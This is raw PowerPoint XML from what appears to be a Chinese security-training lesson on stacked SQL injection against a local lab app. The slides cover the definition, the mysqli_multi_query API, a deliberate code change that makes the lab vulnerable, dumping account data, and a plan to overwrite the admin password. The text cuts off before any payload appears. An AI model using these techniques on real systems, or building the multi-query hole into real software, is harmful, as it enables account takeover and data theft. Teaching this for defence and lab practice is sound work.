            <a:off x="5230351" y="3902999"/>
            <a:ext cx="5971046" cy="1432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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CD2322A-ECEE-E446-8793-A2B1193347DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5230351" y="3294063"/>
            <a:ext cx="597104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相关API及使用方式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40807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BEBA81A-14FB-D54F-BA16-63ABCB5701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堆叠注入定义及原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33286910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73694E-6419-C940-91E6-3FBB1F0D9C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44700" y="2754000"/>
            <a:ext cx="8602279" cy="3510166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一堆 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>多条</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一起执行。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在 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主要是命令行中</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>每一条语句结尾加</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表示语句结束。这样我们就想到了是不是可以多句一起使用。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这个叫做 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>stacked  injection</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" dirty="0"/>
              <a:t>。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E14782-4650-2440-AC41-0CF73AC29A3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044700" y="1954893"/>
            <a:ext cx="4945203" cy="355624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堆叠注入（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Stacked</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Injections</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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堆叠注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 定义</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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477" y="1866017"/>
            <a:ext cx="4445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074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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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堆叠注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 定义</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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477" y="1866017"/>
            <a:ext cx="444500" cy="444500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10" descr="手机屏幕的截图&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6830CBF-3782-2C4E-B5BE-610A240D1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900" y="1866017"/>
            <a:ext cx="87122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100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73694E-6419-C940-91E6-3FBB1F0D9C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44700" y="2754000"/>
            <a:ext cx="8602279" cy="3510166"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结束一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句后继续构造下一条语句，使多条语句顺序执行，这就是堆叠注入。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>思考：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>union injection</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>联合注入）也是将两条语句合并在一起，两者之间有什么区别么？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E14782-4650-2440-AC41-0CF73AC29A3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044700" y="1954893"/>
            <a:ext cx="4945203" cy="355624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堆叠注入（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Stacked</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Injections</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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堆叠注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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477" y="1866017"/>
            <a:ext cx="4445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075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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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堆叠注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 原理 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 测试</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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477" y="1452358"/>
            <a:ext cx="444500" cy="444500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10" descr="手机屏幕的截图&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0ED61EC8-45E8-C842-A3F1-7826A9DDE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373" y="2604328"/>
            <a:ext cx="7409793" cy="353401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B3A3ACA-491F-2747-B577-54D79B66FBFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1721794" y="1465228"/>
            <a:ext cx="8489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union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN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union all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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执行的语句类型是有限的，只可以用来执行查询语句，而堆叠注入可以执行任意的语句。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="20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r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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注意：场景少，但是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod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威力大</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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3139199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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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定义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E14782-4650-2440-AC41-0CF73AC29A3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900956" y="1599269"/>
            <a:ext cx="4945203" cy="355624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报错注入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>Error based Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" dirty="0"/>
              <a:t>）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73694E-6419-C940-91E6-3FBB1F0D9C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13748" y="2305200"/>
            <a:ext cx="8405909" cy="3901383"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一种 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 注入的类型，用于使 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 语句报错的语法，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用于注入结果无回显但</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>错误信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有输出的情况。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返回的错误信息即是攻击者需要的信息。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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29" y="1510393"/>
            <a:ext cx="4445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786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73694E-6419-C940-91E6-3FBB1F0D9C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94860" y="2155286"/>
            <a:ext cx="8602279" cy="3510166"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>并不是每一个环境下都可以执行，很可能受到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者数据库引擎不支持的限制，同时权限不足也是面临的主要问题。</a:t>
            </a:r>
            <a:endParaRPr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真实环境中：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1"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通常只返回一个查询结果，因此，堆叠注入第二个语句产生错误或者结果只能被忽略，我们在前端界面是无法看到返回结果的；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在使用堆叠注入之前，我们也是需要知道一些数据库相关信息的，例如表名，列名等信息。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E14782-4650-2440-AC41-0CF73AC29A3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72557" y="1496796"/>
            <a:ext cx="4945203" cy="355624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堆叠注入（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Stacked</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Injections</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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堆叠注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 局限性</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27423043-1F53-1543-A85B-9F1F4F633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477" y="1452358"/>
            <a:ext cx="4445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676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BEBA81A-14FB-D54F-BA16-63ABCB5701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漏洞相关</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>API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49606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E14782-4650-2440-AC41-0CF73AC29A3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66327" y="1781220"/>
            <a:ext cx="7162362" cy="529297"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysqli_multi_query</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" dirty="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysqli_use_result</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1"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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r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kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>相关</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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477" y="1866017"/>
            <a:ext cx="444500" cy="444500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="手机屏幕截图&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50E69134-282A-254F-9EF2-6415C9FAC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837" y="2447045"/>
            <a:ext cx="4318657" cy="393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3000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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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从开发者的角度编码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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477" y="1866017"/>
            <a:ext cx="444500" cy="444500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="屏幕上写着字&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDE4214B-EB12-F140-B453-8B26E572D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3109091"/>
            <a:ext cx="11074400" cy="1943100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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8740877D-523F-C149-8DCD-E15CEE690B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66327" y="1866017"/>
            <a:ext cx="7162362" cy="529297"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注释掉</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysqli_query</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，并新增</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysqli_multi_query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59692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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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3600" y="306000"/>
            <a:ext cx="6730883" cy="76144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测试更新</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后的功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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477" y="1866017"/>
            <a:ext cx="444500" cy="444500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="手机截图图社交软件的信息&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64A91835-6ABF-274F-8E72-61691ECAD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2794438"/>
            <a:ext cx="11176000" cy="2362200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2824F153-280A-0146-9482-F46A902CC4B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66327" y="1866017"/>
            <a:ext cx="7162362" cy="529297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测试查询功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17223955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BEBA81A-14FB-D54F-BA16-63ABCB5701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实战</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20128849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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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3600" y="306000"/>
            <a:ext cx="6730883" cy="76144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回忆上节课的进展</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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477" y="1866017"/>
            <a:ext cx="444500" cy="444500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2824F153-280A-0146-9482-F46A902CC4B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66327" y="1866017"/>
            <a:ext cx="7162362" cy="529297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成功查询到了数据库结构、表结构及用户账户信息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B4F4EFC-AD5A-734B-B91D-0077AAC11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52" y="3109091"/>
            <a:ext cx="11600329" cy="10291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ED64A46-B046-9341-AA1D-96793DB5C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52" y="4366232"/>
            <a:ext cx="11901848" cy="84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743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D87F023-B1A6-9B4C-86FC-E3E54A3DC31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3600" y="306000"/>
            <a:ext cx="6730883" cy="76144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如何登录目标账户？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6" descr="卡通人物&#10;&#10;描述已自动生成">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28FC3B08-4E3B-B94C-8316-E1785BAEA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477" y="1866017"/>
            <a:ext cx="444500" cy="444500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2824F153-280A-0146-9482-F46A902CC4B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66326" y="1866017"/>
            <a:ext cx="8223907" cy="76144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也许</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>解密难度很高，无法解密（很常见）</a:t>
            </a:r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2F8DC76E-BD88-9942-A628-898DC1393B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6326" y="2627460"/>
            <a:ext cx="8602279" cy="3510166"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" dirty="0"/>
              <a:t>这时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们就可以使用堆叠注入，对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>账户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行更新。</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>http://127.0.0.1:81/vulnerabilities/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
